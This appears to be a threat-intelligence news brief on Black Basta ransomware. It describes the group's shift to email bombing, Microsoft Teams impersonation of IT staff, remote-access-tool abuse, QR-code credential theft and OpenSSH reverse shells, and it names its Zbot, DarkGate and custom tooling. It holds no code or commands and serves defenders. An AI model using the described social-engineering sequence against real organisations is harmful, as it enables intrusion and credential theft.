Recent observations reveal that Black Basta ransomware operators have shifted their attack strategy, incorporating new payloads like Zbot and DarkGate since October 2024. The group has adopted sophisticated social engineering techniques, including email bombing campaigns followed by direct communication with targets.
Attack Methodology:
– Initial contact through Microsoft Teams, impersonating IT support staff
– Deployment of legitimate remote access tools (AnyDesk, ScreenConnect, TeamViewer, Quick Assist)
– Use of malicious QR codes for credential theft or directing users to compromised infrastructure
– Implementation of OpenSSH client for reverse shell access
New Payload Delivery:
The attackers utilize remote access to deploy:
– Custom credential harvesting tools
– Zbot (ZLoader)
– DarkGate malware
Technical Arsenal:
Black Basta’s specialized tools include:
– KNOTWRAP: Memory-only C/C++ dropper
– KNOTROCK: .NET-based ransomware executor
– DAWNCRY: Memory-resident payload dropper
– PORTYARD: Custom TCP protocol tunneler
– COGSCAN: Network reconnaissance tool
Evolution from Conti:
Since emerging from Conti’s dissolution in 2022, Black Basta has evolved from QakBot-dependent operations to a hybrid approach combining botnet and social engineering tactics. Microsoft tracks the group’s Quick Assist abuse under the designation Storm-1811.
The group’s primary objectives remain consistent: rapid environment enumeration, credential theft, and VPN configuration capture for unauthorized network access.